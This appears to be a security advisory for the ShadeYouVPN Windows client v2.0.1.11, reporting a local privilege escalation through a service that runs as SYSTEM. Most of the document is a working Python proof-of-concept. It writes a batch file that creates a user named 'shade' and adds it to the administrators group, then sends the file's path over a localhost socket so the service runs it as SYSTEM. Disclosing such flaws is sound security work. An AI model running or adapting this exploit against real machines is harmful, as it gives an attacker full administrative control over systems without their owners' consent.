ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

Homepage:

https://shadeyouvpn.com/

Description:

ShadeYou runs as SYSTEM process.

wmic service where name="ShadeYou" get StartName
StartName
LocalSystem

This service executes any file without any verification as SYSTEM user.

We only need to send file path through socket.

Proof of Concept:

Download Exploit

import socket
import tempfile

print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"

t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")
t.close()

s = socket.socket()
s.connect(("127.0.0.1", 10295))

s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n")
print s.recv(1024)
print s.recv(1024)

Timeline: